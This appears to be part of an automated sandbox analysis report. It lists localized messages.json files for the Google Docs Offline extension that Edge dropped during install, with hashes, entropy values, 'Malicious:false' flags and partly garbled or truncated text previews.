                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1337
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                    MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                    SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                    SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                    SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2846
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                    MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                    SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                    SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                    SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):934
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                    MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                    SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                    SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                    SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):963
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                    MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                    SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                    SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                    SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1320
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                    MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                    SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                    SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                    SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):884
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                    MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                    SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                    SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                    SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):980
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                    MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                    SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                    SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                    SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1941
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                    MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                    SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                    SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                    SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1969
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                    MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                    SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                    SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                    SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1674
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                    MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                    SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                    SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                    SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1063
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                    MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                    SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                    SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                    SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1333
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                    MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                    SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                    SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                    SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1263
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                    MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                    SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                    SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                    SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1940180126\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1074
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                    MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                    SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                    SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                    SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                    Malicious:false
